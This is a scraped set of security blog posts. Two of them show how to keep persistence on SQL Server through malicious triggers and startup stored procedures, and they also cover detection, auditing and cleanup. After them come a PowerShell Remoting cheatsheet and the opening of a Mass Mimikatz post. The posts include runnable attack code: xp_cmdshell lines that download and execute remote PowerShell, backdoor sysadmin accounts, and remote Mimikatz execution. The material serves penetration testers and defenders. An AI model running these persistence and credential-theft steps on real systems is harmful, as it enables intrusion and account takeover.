EXEC master..xp_cmdshell 'Powershell -c "IEX(new-object net.webclient).downloadstring(''https://raw.githubusercontent.com/nullbind/Powershellery/master/Brainstorming/trigger_demo_dml.ps1'')"';

-- Add a sysadmin named 'SysAdmin_DML' if it doesn't exist
if (select count(*) from sys.sql_logins where name like 'SysAdmin_DML') = 0

	-- Create a login
	CREATE LOGIN SysAdmin_DML WITH PASSWORD = 'Password123!';
	
	-- Add the login to the sysadmin fixed server role
	EXEC sp_addsrvrolemember 'SysAdmin_DML', 'sysadmin';
Go
Now, when anyone (privileged or not) inserts a record into the testdb.dbo.noclist table the trigger will run our PowerShell command and add our sysadmin. :) Let's test it out using the steps below.
  1. Log into the server as the testuser using SQL Server management studio express.
  2. Add some more records to the NOCList table.
    -- Select testdb database
    USE testdb
    
    -- Add sample records to table x 4
    INSERT dbo.NOCList (SpyName, RealName)
    VALUES ('James Bond','Sean Connery')
    INSERT dbo.NOCList (SpyName, RealName)
    VALUES ('Ethan Hunt','Tom Cruise')
    INSERT dbo.NOCList (SpyName, RealName)
    VALUES ('Jason Bourne','Matt Damon')
    
  3. Review sysadmins and the local drive for our file.
Finally, to view all database levels trigger for the currently selected database with the query below.
USE 
[DATABASE]
SELECT * FROM sys.triggers 

Creating Malicious Logon Triggers

Logon triggers are primarily used to prevent users from logging into SQL Server under defined conditions. The canonical examples include creating a logon trigger to prevent users from logging in after hours or establishing concurrent sessions. As a result, this is the least useful persistence option, because we would have to actively block a user from authenticating in order for the trigger to run. On the bright side you can create a logon trigger that binds to a specific least privilege account. Then simply attempting to login with that account can execute whatever SQL query or operating system command you want. Example Code In this example, we'll create a logon trigger designed to execute a PowerShell script from the internet that will write a file to "c:temptrigger_demo_logon.txt" when the SQL login "testuser" successfully authenticates and is prevented from logging in. This trigger is also configured to run as the "sa" default sysadmin account.
-- Create trigger
CREATE Trigger [persistence_logon_1]
ON ALL SERVER WITH EXECUTE AS 'sa'
FOR LOGON
AS
BEGIN
IF ORIGINAL_LOGIN() = 'testuser'
	-- Download a PowerShell script from the internet to memory and execute it
    EXEC master..xp_cmdshell 'Powershell -c "IEX(new-object net.webclient).downloadstring(''https://raw.githubusercontent.com/nullbind/Powershellery/master/Brainstorming/trigger_demo_logon.ps1'')"';
END;
Now when you try to logon with the "testuser" account you should see the message below. You won't be able to login, but the SQL Server will execute you're trigger and the associated PowerShell code. You can view all server and logon triggers with the query below.
SELECT * FROM sys.server_triggers 

Malicious Trigger Detection

If you enabled auditing during the lab setup, you should see event id 33205 in the Windows application event log. The "statement" field should start with "CREATE Trigger" for all three types of triggers, and be immediately followed by the rest of the trigger's source code. From here you could write some SIEM rules to generate an alert when the "statement" field contains keywords like xp_cmdshell, powershell, and sp_addsrvrolemember along with the CREATE Trigger statement. Below is an example screenshot of the logged event. We also provided the public role with the ability to impersonate the "sa" login. This event also ends up in event ID 33205. This time the GRANT statement shows up in the "statement" field. Once again SIEM rules could be created to watch for GRANT statements assigning IMPERSONATE privileges. In our next event ID 33205 log, we can actually see the name of the trigger, the login that executed the trigger, and the login being impersonated. That can be pretty useful information. : ) In this case, it may be worth it to watch for "EXECUTE AS" in the statement field. However, depending on the environment, some tweaking may be needed.

Viewing Server Level Triggers (DDL and LOGON)

Below is a code snippet that can be used to list server level triggers and the associated source code. Please note that you must be a sysadmin in order to view the source code.
SELECT	name,
OBJECT_DEFINITION(OBJECT_ID) as trigger_definition,
parent_class_desc,
create_date,
modify_date,
is_ms_shipped,
is_disabled
FROM sys.server_triggers WHERE 
OBJECT_DEFINITION(OBJECT_ID) LIKE '%xp_cmdshell%' OR
OBJECT_DEFINITION(OBJECT_ID) LIKE '%powershell%' OR
OBJECT_DEFINITION(OBJECT_ID) LIKE '%sp_addsrvrolemember%' 
ORDER BY name ASC

Viewing Database Level Triggers (DML)

Below is a code snippet that can be used to list database level triggers and the associated source code. Please note that you must be a sysadmin (or have the require privileges) and have the database selected that the trigger were created in.
-- Select testdb
USE testdb

-- Select potentially evil triggers
SELECT	@@SERVERNAME as server_name,
	(SELECT TOP 1 SCHEMA_NAME(schema_id)FROM sys.objects WHERE type ='tr' and object_id like object_id ) as schema_id ,
	DB_NAME() as database_name,
	OBJECT_NAME(parent_id) as parent_name,
	OBJECT_NAME(object_id) as trigger_name,
	OBJECT_DEFINITION(object_id) as trigger_definition,
	OBJECT_ID,
	create_date,
	modify_date,
	CASE OBJECTPROPERTY(object_id, 'ExecIsTriggerDisabled')
		WHEN 1 THEN 'Disabled'
		ELSE 'Enabled'
        END AS status,
	OBJECTPROPERTY(object_id, 'ExecIsUpdateTrigger') AS isupdate ,
	OBJECTPROPERTY(object_id, 'ExecIsDeleteTrigger') AS isdelete ,
	OBJECTPROPERTY(object_id, 'ExecIsInsertTrigger') AS isinsert ,
	OBJECTPROPERTY(object_id, 'ExecIsAfterTrigger') AS isafter ,
	OBJECTPROPERTY(object_id, 'ExecIsInsteadOfTrigger') AS isinsteadof ,
	is_ms_shipped,
	is_not_for_replication
FROM sys.triggers WHERE 
OBJECT_DEFINITION(OBJECT_ID) LIKE '%xp_cmdshell%' OR
OBJECT_DEFINITION(OBJECT_ID) LIKE '%powershell%' OR
OBJECT_DEFINITION(OBJECT_ID) LIKE '%sp_addsrvrolemember%' 
ORDER BY name ASC

Malicious Trigger Removal

Below is some basic guidance for disabling and removing evil triggers.

Disabling Triggers

Disabling triggers may be a good option if you're still looking at the trigger's code, and don't feel comfortable fully removing it from the system yet. Note: Logon and DDL triggers can be disabled regardless of what database is currently selected, but for DML triggers you'll need to have the database selected that the trigger was created in.
DISABLE TRIGGER [persistence_ddl_1] on all server
DISABLE TRIGGER [persistence_ddl_2] on all server
DISABLE TRIGGER [persistence_logon_1] on all server
USE testdb
DISABLE TRIGGER [persistence_dml_1]

Removing Triggers

Once you're ready to commit to removing a trigger you can use the TSQL statements below. Note: Logon and DDL triggers can be removed regardless of what database is currently selected, but for DML triggers you'll have the have the database selected that the trigger was created in.
DROP TRIGGER [persistence_ddl_1] on all server
DROP TRIGGER [persistence_ddl_2] on all server
DROP TRIGGER [persistence_logon_1] on all server
USE testdb
DROP TRIGGER [persistence_dml_1]

Automating the Attack

For those of you that don't like copying and pasting code, I've created a little demo script with the comically long name "Invoke-SqlServer-Persist-TriggerDDL.psm1". It only supports DDL triggers, but it works well enough to illustrate the point. By default, the script targets the event group "DDL_SERVER_LEVEL_EVENTS", but you could change the hardcoded value to "DDL_EVENTS" if you wanted to expand the scope. Below are some basic usage instructions for those who are interested. Once the triggers have been created, you can set them off by adding or removing a SQL login, or by executing any of the other DDL server level events. Script Examples
  1. Download or reflectively load the PowerShell script as shown below.
    IEX(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/NetSPI/PowerShell/master/Invoke-SqlServer-Persist-TriggerDDL.psm1')
  2. Create a trigger to add a new SQL Server sysadmin login as the current domain user.
    Invoke-SqlServer-Persist-TriggerDDL -SqlServerInstance "SERVERNAMEINSTANCENAME" -NewSqlUser EvilSysAdmin -NewSqlPass Password123!
  3. Create a trigger to add a local administrator as the current domain user. This will only work if the SQL Server service account has local administrative privileges.
    Invoke-SqlServer-Persist-TriggerDDL -SqlServerInstance "SERVERNAMEINSTANCENAME" -NewOsUser EvilOsAdmin -NewOsPass Password123!
  4. Create a trigger to run arbitrary PowerShell command. In this case the PowerShell script creates the file c:tempHelloWorld.txt.Invoke.
    SqlServer-Persist-TriggerDDL -Verbose -SqlServerInstance "SERVERNAMEINSTANCENAME" -PsCommand "IEX(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/nullbind/Powershellery/master/Brainstorming/helloworld.ps1')"
  5. Remove the malicious trigger as the current domain user when you're all done.
    Invoke-SqlServer-Persist-TriggerDDL -Verbose -SqlServerInstance "SERVERNAMEINSTANCENAME" -Remove
    
    

Clean Up Script

Below is a script for cleaning up the mess we made during the labs. Some of the items were covered in the malicious trigger removal section, but this will cover it all.
-- Remove database and associate DML trigger
DROP DATABASE testdb

-- Select master database
USE master

-- Revoke all impersonate privilege provided to public role
REVOKE IMPERSONATE ON LOGIN::sa to [Public];

-- Remove logins
DROP LOGIN testuser
DROP LOGIN SysAdmin_DDL
DROP LOGIN SysAdmin_DML
    
-- Remove triggers
DROP TRIGGER [persistence_ddl_2] on all server
DROP TRIGGER [persistence_ddl_1] on all server
DROP TRIGGER [persistence_logon_1] on all server

-- Remove audit specifications
ALTER SERVER AUDIT Audit_Object_Changes WITH (STATE = OFF)
DROP SERVER AUDIT Audit_Object_Changes

ALTER SERVER AUDIT SPECIFICATION Audit_Server_Level_Object_Changes WITH (STATE = OFF)
DROP SERVER AUDIT SPECIFICATION Audit_Server_Level_Object_Changes

ALTER DATABASE AUDIT SPECIFICATION Audit_Database_Level_Object_Changes WITH (STATE = OFF)
DROP DATABASE AUDIT SPECIFICATION Audit_Database_Level_Object_Changes

Wrap Up

In this blog we learned how to use SQL Server triggers maintain access to Windows systems. We also covered some options for detecting potentially malicious behavior. Hopefully, this will help create some awareness around this type of persistence method. Have fun and hack responsibly.

References

[post_title] => Maintaining Persistence via SQL Server – Part 2: Triggers [post_excerpt] => In this blog, I'll show how three types of SQL Server triggers can be abused to maintain access to Windows environments. [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => maintaining-persistence-via-sql-server-part-2-triggers [to_ping] => [pinged] => [post_modified] => 2021-06-08 21:47:24 [post_modified_gmt] => 2021-06-08 21:47:24 [post_content_filtered] => [post_parent] => 0 [guid] => https://netspiblogdev.wpengine.com/?p=6231 [menu_order] => 532 [post_type] => post [post_mime_type] => [comment_count] => 0 [filter] => raw ) [43] => WP_Post Object ( [ID] => 6091 [post_author] => 17 [post_date] => 2016-03-07 07:00:24 [post_date_gmt] => 2016-03-07 07:00:24 [post_content] => During red team and penetration test engagements, one common goal is to maintain access to target environments while security teams attempt to identify and remove persistence methods. There are many ways to maintain persistent access to Windows environments. However, detective controls tend to focus on compromised account identification and persistence methods at the operating system layer. While prioritizing detective control development in those areas is a good practice, common database persistence methods are often overlooked. In this blog series, I'm planning to take a look at few techniques for maintaining access through SQL Server and how they can be detected by internal security teams. Hopefully they will be interesting to both red and blue teams. Below is an overview of what will be covered in this blog:

Why use SQL Server as a Persistence Method?

It may not be immediately obvious why anyone would use SQL Server or other database platforms to maintain access to an environment, so I've provided some of the advantages below.
  1. The .mdf files that SQL Server uses to store data and other objects such as stored procedures are constantly changing, so there is no easy way to use File Integrity Monitoring (FIM) to identify database layer persistence methods.
  2. SQL Server persistence methods that interact with the operating systems will do so under the context of the associated SQL Server service account. This helps make potentially malicious actions appear more legitimate.
  3. It's very common to find SQL Server service accounts configured with local administrative or LocalSystem privileges. This means that in most cases any command and control code running from SQL Server will have local administrative privileges.
  4. Very few databases are configured to audit for common Indicators of Compromise (IoC) and persistence methods.
With that out of the way, let's learn a little about stored procedures.

Introduction to Startup Stored Procedures

In SQL Server, stored procedures are basically chunks of SQL code intended for reuse that get compiled into a single execution plan. Similar to functions, they can accept parameters and provide output to the user. SQL Server ships with quite a few native stored procedures, but they can also be user defined. Once logged into SQL Server, it's possible to execute stored procedures that the current user has privileges to execute. For more general information regarding stored procedures, visit https://technet.microsoft.com/en-us/library/aa174792(v=sql.80).aspx. The native sp_procoption stored procedure can be used to configure user defined stored procedures to run when SQL Server is started or restarted. The general idea is very similar to the "run" and "run once" registry keys commonly used for persistence by developers, malware, and penetration testers. Before we get started on creating our evil startup stored procedures there are a few things to be aware of. The stored procedures configured for automatic execution at start time:
  • Must exist in the Master database
  • Cannot accept INPUT or OUTPUT parameters
  • Must be marked for automatic execution by a sysadmin
General Note: Based on my time playing with this in a lab environment, all startup stored procedures are run under the context of the sa login, regardless of what login was used to flag the stored procedure for automatic execution. Even if the sa login is disabled, the startup procedures will still run under the sa context when the service is restarted.

Startup Stored Procedure Detection

In this section I've provided an example script that can be used to enable audit features in SQL Server that will log potentially malicious startup procedure activities to the Windows Application event log. Normally I would introduce the attack setup first, but if the audit controls are not enabled ahead of time the events we use to detect the attack won't show up in the Windows application event log. Important Note: Be aware that the sysadmin privileges are required to run the script, and recommendations in this section will not work on SQL Server Express, because SQL Server Auditing is a commercial feature. SQL Server Auditing can be used to monitor all kinds of database activity. For those who are interested in learning more I recommend checking out this Microsoft site. https://technet.microsoft.com/en-us/library/cc280386(v=sql.110).aspx Audit Setup Instructions Follow the instructions below to enable auditing:
  1. Create and enable a SERVER AUDIT.
    -- Select master database
    USE master
    
    -- Setup server audit to log to application log
    CREATE SERVER AUDIT Audit_StartUp_Procs
    TO APPLICATION_LOG
    WITH (QUEUE_DELAY = 1000, ON_FAILURE = CONTINUE)
    
    -- Enable server audit
    ALTER SERVER AUDIT Audit_StartUp_Procs
    WITH (STATE = ON)
  2. Create an enabled SERVER AUDIT SPECIFICATION. This will enable auditing of defined server level events. In this example, it's been configured to monitor group changes, server setting changes, and audit setting changes.
    -- Create server audit specification
    CREATE SERVER AUDIT SPECIFICATION Audit_StartUp_Procs_Server_Spec
    FOR SERVER AUDIT Audit_StartUp_Procs
    ADD (SERVER_ROLE_MEMBER_CHANGE_GROUP), 
    
    -- track group changes
    ADD (SERVER_OPERATION_GROUP), 
    
    -- track server setting changes
    ADD (AUDIT_CHANGE_GROUP) 
    
    -- track audit setting changes
    WITH (STATE = ON)
  3. Create an enabled DATABASE AUDIT SPECIFICATION. This will enable auditing of specific database level events. In this case, the execution of the sp_procoption procedure will be monitored.
    -- Create the database audit specification
    CREATE DATABASE AUDIT SPECIFICATION Audit_StartUp_Procs_Database_Spec
    FOR SERVER AUDIT Audit_StartUp_Procs
    ADD (EXECUTE
    ON master..sp_procoption BY public ) 
    
    -- sp_procoption execution
    WITH (STATE = ON)
    GO
  4. All enabled server and database level audit specifications can be viewed with the queries below. Typically, sysadmin privileges are required to view them.
    -- List enabled server specifications
    SELECT		audit_id, 
            a.name as audit_name, 
            s.name as server_specification_name,
            d.audit_action_name,
            s.is_state_enabled,
            d.is_group,
            d.audit_action_id,	
            s.create_date,
            s.modify_date
    FROM sys.server_audits AS a
    JOIN sys.server_audit_specifications AS s
    ON a.audit_guid = s.audit_guid
    JOIN sys.server_audit_specification_details AS d
    ON s.server_specification_id = d.server_specification_id
    WHERE s.is_state_enabled = 1
    
    -- List enabled database specifications
    SELECT	a.audit_id,
            a.name as audit_name,
            s.name as database_specification_name,
            d.audit_action_name,
            s.is_state_enabled,
            d.is_group,
            s.create_date,
            s.modify_date,
            d.audited_result
    FROM sys.server_audits AS a
    JOIN sys.database_audit_specifications AS s
    ON a.audit_guid = s.audit_guid
    JOIN sys.database_audit_specification_details AS d
    ON s.database_specification_id = d.database_specification_id
    WHERE s.is_state_enabled = 1
    If you're interested in finding out about other server and database audit options, you can get a full list using the query below.
    Select DISTINCT action_id,name,class_desc,parent_class_desc,containing_group_name from sys.dm_audit_actions order by parent_class_desc,containing_group_name,name
    
    

Startup Stored Procedure Creation

Now for the fun part. The code examples provided in this section will create two stored procedures and configure them for automatic execution. As a result, the stored procedures will run the next time a patch is applied to SQL Server, or the server is restarted. As mentioned before, sysadmin privileges will be required. Note: This example was performed over a direct database connection, but could potentially be executed through SQL injection as well.
  1. If you're trying this out at home, you can download and install SQL Server with SQL Server Management Studio Express to use for connecting to the remote SQL Server. https://www.microsoft.com/en-us/download/details.aspx?id=42299.
  2. Log into the (commercial version of) SQL Server with sysadmin privileges.
  3. Enable the xp_cmdshell stored procedure. This may not be required, but xp_cmdshell is disabled by default.
    -- Enabled xp_cmdshell
    sp_configure 'show advanced options',1
    RECONFIGURE
    GO
    
    sp_configure 'xp_cmdshell',1
    RECONFIGURE
    GO
    When a system setting like "xp_cmdshell" is changed, the Windows Application event log should include event ID 15457. Also, event ID 33205 should show up with a statement field set to "reconfigure". I don't see xp_cmdshell enabled very often. So most attackers will have to enable it to perform OS level operations.
  4. Create a stored procedure to add a new sysadmin Login using the query below.
    ------------------------------
    -- Create a stored procedure 1
    ------------------------------
    USE MASTER
    GO
    
    CREATE PROCEDURE sp_add_backdoor_account
    AS
    
    -- create sql server login backdoor_account
    CREATE LOGIN backdoor_account WITH PASSWORD = 'Password123!';
    
    -- Add backdoor_account to sysadmin fixed server role
    EXEC sp_addsrvrolemember 'backdoor_account', 'sysadmin';
    
    GO
  5. Create a stored procedure to use the xp_cmdshell stored procedure to download and execute a PowerShell payload from the internet using the query below. The script in the example simply writes a c:temphelloworld.txt file, but you can use any PowerShell payload. Something like a PowerShell Empire agent could be handy.
    ------------------------------
    -- Create a stored procedure 2
    ------------------------------
    USE MASTER
    GO
    
    CREATE PROCEDURE sp_add_backdoor
    AS
    -- Download and execute PowerShell code from the internet
    EXEC master..xp_cmdshell 'powershell -C "Invoke-Expression (new-object System.Net.WebClient).DownloadString(''https://raw.githubusercontent.com/nullbind/Powershellery/master/Brainstorming/helloworld.ps1'')"'
    GO
  6. Configure the stored procedures to run when the SQL Server service is restarted using the query below.
    ------------------------------------------------
    -- Configure stored procedure to run at startup
    ------------------------------------------------
    -- Set 'sp_add_backdoor_account' to auto run
    EXEC sp_procoption @ProcName = 'sp_add_backdoor_account',
    @OptionName = 'startup',
    @OptionValue = 'on';
    
    -- Setup 'sp_add_backdoor' to auto run
    EXEC sp_procoption @ProcName = 'sp_add_backdoor',
    @OptionName = 'startup',
    @OptionValue = 'on';
    After execution, the event ID 33205 should show up in the Windows Application event log if auditing has been enabled. The "object_name" should contain "sp_procoption", and the name of the startup stored procedure can be found in the "statement" field. I haven't seen this option used very often in production environments. So alerting on it shouldn't generate too many false positives. Below is an example of the event output.
  7. Confirm the configuration worked using the query below.
    -- List stored procedures mark for automatic execution
    SELECT [name] FROM sysobjects
    WHERE type = 'P'
    AND OBJECTPROPERTY(id, 'ExecIsStartUp') = 1;
  8. If you're doing this lab on a test instance on your own system, then you can restart the SQL Server service. If you're performing an actual penetration test, you'll have to wait for the service or server to restart before the procedures are executed. Usually that will happen during standard patch cycles. So if you're procedures start a reverse shell you may have to wait a while. Very Important Note: Only perform this step in a lab environment and NEVER restart a production service. Unless of course you want to be attacked by an angry mob of DBAs and business line owners. That being said, you can restart the service with the sc or the PowerShell restart-service commands. However, if you're a GUI fan you can just use services.msc as shown below.When the SQL Server service restarts it will launch the startup procedures and Windows event ID 17135 is used to track that event as shown below.
  9. Verify that a new sysadmin login named "backdoor_account" was added.When a login is added to the sysadmin fixed server role event ID 33205 should show up again in the application log. However, this time the "object_name" should contain "sysadmin", and the name of the affected account can be found in the "statement" field. Sysadmins shouldn't be changed too often in production environments, so this can also be a handy thing to monitor.

Startup Stored Procedure Code Review

At this point you should be able to view the log entries described earlier (33205 and 17135). They should tell you what procedures to dig into. If you're interested in what they're doing, it's possible to view the source code for all startup stored procedures with the query below.
SELECT ROUTINE_NAME, ROUTINE_DEFINITION
FROM MASTER.INFORMATION_SCHEMA.ROUTINES
WHERE OBJECTPROPERTY(OBJECT_ID(ROUTINE_NAME),'ExecIsStartup') = 1
Be aware that you will need privileges to view them, but as a sysadmin it shouldn't be an issue.

Startup Stored Procedure Removal

My guess is that at some point you'll want to remove your sample startup procedures and audit settings, so below is a removal script.
-- Disable xp_cmdshell
sp_configure 'xp_cmdshell',0
reconfigure
go

sp_configure 'show advanced options',0
reconfigure
go

--Stop stored procedures from starting up
EXEC sp_procoption @ProcName = 'sp_add_backdoor',
@OptionName = 'startup',
@OptionValue = 'off';

EXEC sp_procoption @ProcName = 'sp_add_backdoor_account',
@OptionName = 'startup',
@OptionValue = 'off';

-- Remove stored procedures
DROP PROCEDURE sp_add_backdoor
DROP PROCEDURE sp_add_backdoor_account

-- Disable and remove SERVER AUDIT
ALTER SERVER AUDIT Audit_StartUp_Procs
WITH (STATE = OFF)
DROP SERVER AUDIT Audit_StartUp_Procs

-- Disable and remove SERVER AUDIT SPECIFICATION
ALTER SERVER AUDIT SPECIFICATION Audit_StartUp_Procs_Server_Spec
WITH (STATE = OFF)
DROP SERVER AUDIT SPECIFICATION Audit_StartUp_Procs_Server_Spec

-- Disable and remove DATABASE AUDIT SPECIFICATION
ALTER DATABASE AUDIT SPECIFICATION Audit_StartUp_Procs_Database_Spec
WITH (STATE = OFF)
DROP DATABASE AUDIT SPECIFICATION Audit_StartUp_Procs_Database_Spec

So...
If an attacker decides to be clever and disable the audit settings it will also show up under event ID 33205. In this case, the statement will include "ALTER SERVER AUDIT" or "DROP SERVER AUDIT" along with the rest of the statement. Also, "object_name" will be the name of the SERVER AUDIT. This is another thing that shouldn't change very often in production environments so it's a good this to watch. Below is a basic screenshot example.


Automating the Attack

I put together a little PowerShell script called "Invoke-SqlServer-Persist-StartupSp.psm1" to automate the attack. Below are some basic usage instructions for those who are interested.
  1. Download the script or reflectively load it from here.
    IEX(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/NetSPI/PowerShell/master/Invoke-SqlServer-Persist-StartupSp.psm1')
  2. The example below shows how to add a SQL Server sysadmin via a startup stored procedure every time the SQL Server service is restarted.
    Invoke-SqlServer-Persist-StartupSp -Verbose -SqlServerInstance "MSSQL2008WIN8" -NewSqlUser EvilSysadmin1 -NewSqlPass Password123!
    Add Sysadmin
  3. The example below shows how to add a local Windows Administrator via a startup stored procedure every time the SQL Server service is restarted.
    Invoke-SqlServer-Persist-StartupSp -Verbose -SqlServerInstance "MSSQL2008WIN8" -NewosUser Evilosadmin1 -NewosPass Password123!
    Add Osadmin
  4. The example below shows how to run arbitrary PowerShell code via a startup stored procedure every time the SQL Server service is restarted.
    Invoke-SqlServer-Persist-StartupSp -Verbose -SqlServerInstance "MSSQL2008WIN8" -PsCommand "IEX(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/nullbind/Powershellery/master/Brainstorming/helloworld.ps1')"
    Add Pscmd

Wrap Up

In this blog I covered how to create, detect, and remove malicious startup stored procedures in SQL Server. Hopefully, this will help create some awareness around this type of persistence method. Big thanks to Grisha Kumar and Ben Tindell for verifying all the code samples for this blog. Have fun and hack responsibly! Note: All testing was done on Windows 8 running SQL Server 2014 Standard Edition.

References

[post_title] => Maintaining Persistence via SQL Server – Part 1: Startup Stored Procedures [post_excerpt] => In this blog I show how to use SQL Server startup stored procedures to maintain access to Windows environments and share a PowerShell script to automate the attack... [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => sql-server-persistence-part-1-startup-stored-procedures [to_ping] => [pinged] => [post_modified] => 2021-06-08 21:47:17 [post_modified_gmt] => 2021-06-08 21:47:17 [post_content_filtered] => [post_parent] => 0 [guid] => https://netspiblogdev.wpengine.com/?p=6091 [menu_order] => 536 [post_type] => post [post_mime_type] => [comment_count] => 0 [filter] => raw ) [44] => WP_Post Object ( [ID] => 5280 [post_author] => 17 [post_date] => 2015-07-31 07:00:55 [post_date_gmt] => 2015-07-31 07:00:55 [post_content] =>

I have become a big fan of PowerShell Remoting. I find my self using it for both penetration testing and standard management tasks. In this blog I'll share a basic PowerShell Remoting cheatsheet so you can too.

Introduction to PowerShell Remoting

PowerShell Remoting is essentially a native Windows remote command execution feature that’s build on top of the Windows Remote Management (WinRM) protocol. Based on my super Google results, WinRM is supported by Windows Vista with Service Pack 1 or later, Windows 7, Windows Server 2008, and Windows Server 2012.

Enabling PowerShell Remoting

Before we get started let's make sure PowerShell Remoting is all setup on your system.

1. In a PowerShell console running as administrator enable PowerShell Remoting.

Enable-PSRemoting –force

This should be enough, but if you have to troubleshoot you can use the commands below.

2. Make sure the WinRM service is setup to start automatically.

# Set start mode to automatic
Set-Service WinRM -StartMode Automatic

# Verify start mode and state - it should be running
Get-WmiObject -Class win32_service | Where-Object {$_.name -like "WinRM"}

3. Set all remote hosts to trusted. Note: You may want to unset this later.

# Trust all hosts
Set-Item WSMan:localhost\client\trustedhosts -value *

# Verify trusted hosts configuration
Get-Item WSMan:\localhost\Client\TrustedHosts

Executing Remote Commands with PowerShell Remoting

Now we can play around a little. There’s a great blog from a while back that provides a nice overview of PowerShell Remoting at https://blogs.technet.com/b/heyscriptingguy/archive/2009/10/29/hey-scripting-guy-october-29-2009.aspx. It’s definitely on my recommended reading list, but I'll expand on the examples a little.

Executing a Single Command on a Remote System

The "Invoke-Command" command can be used to run commands on remote systems. It can run as the current user or using alternative credentials from a non domain system. Examples below.

Invoke-Command –ComputerName MyServer1 -ScriptBlock {Hostname}
Invoke-Command –ComputerName MyServer1 -Credential demo\serveradmin -ScriptBlock {Hostname}

If the ActiveDirectory PowerShell module is installed it's possible to execute commands on many systems very quickly using the pipeline. Below is a basic example.

Get-ADComputer -Filter *  -properties name | select @{Name="computername";Expression={$_."name"}} | Invoke-Command -ScriptBlock {hostname}

Sometimes it’s nice to run scripts stored locally on your system against remote systems. Below are a few basic examples.

Invoke-Command -ComputerName MyServer1 -FilePath C:\pentest\Invoke-Mimikatz.ps1
Invoke-Command -ComputerName MyServer1 -FilePath C:\pentest\Invoke-Mimikatz.ps1 -Credential demo\serveradmin

Also, if your dynamically generating commands or functions being passed to remote systems you can use invoke-expression through invoke-command as shown below.

$MyCommand = "hostname"
$MyFunction = "function evil {write-host `"Getting evil...`";iex -command $MyCommand};evil"
invoke-command -ComputerName MyServer1 -Credential demo\serveradmin -ScriptBlock {Invoke-Expression -Command  "$args"} -ArgumentList $MyFunction

Establishing an Interactive PowerShell Console on a Remote System

An interactive PowerShell console can be obtained on a remote system using the "Enter-PsSession" command. It feels a little like SSH. Similar to "Invoke-Command", "Enter-PsSession" can be run as the current user or using alternative credentials from a non domain system. Examples below.

Enter-PsSession –ComputerName server1.domain.com
Enter-PsSession –ComputerName server1.domain.com –Credentials domain\serveradmin

If you want out of the PowerShell session the "Exit-PsSession" command can be used.

Exit-PsSession

Creating Background Sessions

There is another cool feature of PowerShell Remoting that allows users to create background sessions using the "New-PsSession" command. Background sessions can come in handy if you want to execute multiple commands against many systems. Similar to the other commands, the "New-PsSession" command can run as the current user or using alternative credentials from a non domain system. Examples below.

New-PSSession -ComputerName server1.domain.com
New-PSSession –ComputerName server1.domain.com –Credentials domain\serveradmin

If the ActiveDirectory PowerShell module is installed it's possible to create background sessions for many systems at a time (However, this can be done in many ways). Below is a command example showing how to create background sessions for all of the domain systems. The example shows how to do this from a non domain system using alternative domain credentials.

New-PSDrive -PSProvider ActiveDirectory -Name RemoteADS -Root "" -Server a.b.c.d -credential domain\user
cd RemoteADS:
Get-ADComputer -Filter * -Properties name  | select @{Name="ComputerName";Expression={$_."name"}} | New-PSSession

Listing Background Sessions

Once a few sessions have been established the "Get-PsSession" command can be used to view them.

Get-PSSession

Interacting with Background Sessions

The first time I used this feature I felt like I was working with Metasploit sessions, but these sessions are a little more stable. Below is an example showing how to interact with an active session using the session id.

Enter-PsSession –id 3

To exit the session use the "Exit-PsSession" command. This will send the session into the background again.

Exit-PsSession

Executing Commands through Background Sessions

If your goal is to execute a command on all active sessions the "Invoke-Command" and "Get-PsSession" commands can be used together. Below is an example.

Invoke-Command -Session (Get-PSSession) -ScriptBlock {Hostname}

Removing Background Sessions

Finally, to remove all of your active sessions the "Disconnect-PsSession" command can be used as shown below.

Get-PSSession | Disconnect-PSSession 

Wrap Up

Naturally PowerShell Remoting offers a lot of options for both administrators and penetration testers. Regardless of your use case I think it boils down to this:

  • Use "Invoke-Command" if you're only going to run one command against a system
  • Use "Enter-PSSession" if you want to interact with a single system
  • Use PowerShell sessions when you're going to run multiple commands on multiple systems

Hopefully this cheatsheet will be useful. Have fun and hack responsibly.

References

[post_title] => PowerShell Remoting Cheatsheet [post_excerpt] => I have become a big fan of PowerShell Remoting. I find my self using it for both penetration testing and standard management tasks. In this blog I'll share a basic PowerShell Remoting cheatsheet so you can too. [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => powershell-remoting-cheatsheet [to_ping] => [pinged] => [post_modified] => 2021-04-13 00:05:53 [post_modified_gmt] => 2021-04-13 00:05:53 [post_content_filtered] => [post_parent] => 0 [guid] => https://netspiblogdev.wpengine.com/?p=5280 [menu_order] => 546 [post_type] => post [post_mime_type] => [comment_count] => 4 [filter] => raw ) [45] => WP_Post Object ( [ID] => 5147 [post_author] => 17 [post_date] => 2015-07-27 07:00:33 [post_date_gmt] => 2015-07-27 07:00:33 [post_content] =>

Introduction

Mimikatz is a great “authentication token recovery tool” that the whole pentest community knows and loves.  Since it’s initial development it’s been ported to PowerShell (Invoke-Mimikatz.ps1) and a few “Mass Mimikatz” scripts have been written that wrap around it so Mimikatz can be executed on many domain systems very quickly.  Many “Mass Mimikatz” delivery methods have been used including, but not limited to psexec, schtasks, wmic, and invoke-wmimethod.  Regardless of their differences, they all make scraping Windows domain credentials easier. In this blog I’ll cover some of that history and share my script "Invoke-MassMimikatz-PsRemoting.psm1", which tries to expand on other people's work. It uses PowerShell Remoting and Invoke-Mimikatz.ps1 to collect credentials from remote systems. The new script supports options for auto-targeting domain systems, targeting systems with the WinRM service installed using SPNs, and running from non-domain systems using alternative credentials. The content should be handy for penetration testers, but may also interesting to blue teamers looking to understand how PowerShell Remoting and SPNs can be used during attacks.

A Brief History of the Mass Mimikatz

I thought it would be appropriate to start things of by highlighting some of the work done by others prior to writing my shabby script.  Below are the projects that seemed to stick out the most to me. I highly recommend checking them out.
  • Mimikatz For those who might be new to the security industry, Mimikatz is great tool developed by Benjamin Delpy that can be used to dump cleartext passwords from memory (among many other things) as long as you have local administrator privileges.  Benjamin seems to add new and amazing  features on a pretty regular basis so it’s worth it to keep an eye on the github project and his blog. https://github.com/gentilkiwi/mimikatz
